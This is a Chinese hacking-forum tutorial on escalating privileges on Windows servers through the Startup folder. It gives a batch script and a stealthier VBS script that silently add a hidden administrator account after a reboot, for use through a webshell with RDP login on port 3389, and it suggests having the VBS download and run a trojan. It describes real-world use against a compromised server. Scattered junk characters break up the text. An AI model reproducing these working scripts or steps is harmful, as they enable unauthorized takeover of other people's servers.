- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是( V [$ j: |, f: |: W
启动 提权
& S+ l) Z- W3 X. qC:\Docume~1\All Users\「开始」菜单\程序\启动
' S% B6 U$ p- h: a# q0 ], F在这里必须有写入权限 否则此方法无效3 B K* x& s" O1 e. _: {
因为我是在网吧 这里显示不了路径
# a9 w, Z" g) @1 [+ [+ y$ h我去服务器上演示给大家看
$ Y' m! J5 ] m" o2 I0 p7 J8 Z3 [大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
$ ^4 O( n1 H9 K9 W9 m文件 从而运行我们的文件
, j$ C* g3 g" ~+ }8 U7 H) W' ~这里有两中方式 第一种是批处理9 l/ q4 a+ [ u; _1 W! U& k7 q! O
我们来看下目前 我机器上的用户组
o8 Q! a) J( {- |4 h6 q目前我们没有521这个用户
: Z, K* t0 w1 }) N1 L看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示- a, a P1 M. {. Y) j* q2 {2 i' q
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现 O& E- ^2 _, X3 R# v+ i& l$ q
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
{! k6 `' s- B大家看 已经成功加入了WMMY用户* B4 x% I# H' q. t2 ?6 }3 a7 s
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了1 [! b9 F% E. T, E9 J
当前终端服务端口: 3389
0 h, j! e) Y8 ^6 l" @" r9 o h. D系统自动登录功能未开启/ q. ~! p- k+ y" [& V& P
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了/ Z# A- h1 t3 k M
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
; u6 [! V* o( e' D8 e第一种隐蔽性太差 我们就用第二种吧8 c ^9 s+ y& k
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
' `5 c3 ]6 ~3 W从而取得了3389的登陆权限4 ~" {6 t6 b. b0 e% ]1 X
其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
; w2 N8 _$ I. D8 ?' D G8 t: b基本原理都差不多 我就不多介绍了
# o( [0 l& @) ?教程结束```- |& o& F/ X: U: x1 ^0 @
@echo off
% i2 c1 ]& C6 K6 R/ ]net user 521 521 /add5 D& T! _) F- \3 _" n
net localgroup administrators 521 /add; M/ b8 w7 s) a6 j; W6 c. Q
* s2 L% D6 ?6 n, F2 |% l
on Error Resume next% d& b' @6 y* f9 Z
set wshshell=createobject("wscript.shell")' ^' Y; k% N1 v4 L6 f7 a
a=wshshell.run("net user wmmy$ 1227 /add",0)
5 i) M" l) P8 j; p" s2 j* va=wshshell.run("net localgroup administrators wmmy$ /add",0). U% ?; Y9 p" A$ Y3 W( [
3 L$ N5 v0 ^. @7 ]( B
. i2 N% e# u& p# s# N _点击下载0 ^ m3 n% ^! \3 o+ n2 f
|
-
2
评分人数
-
|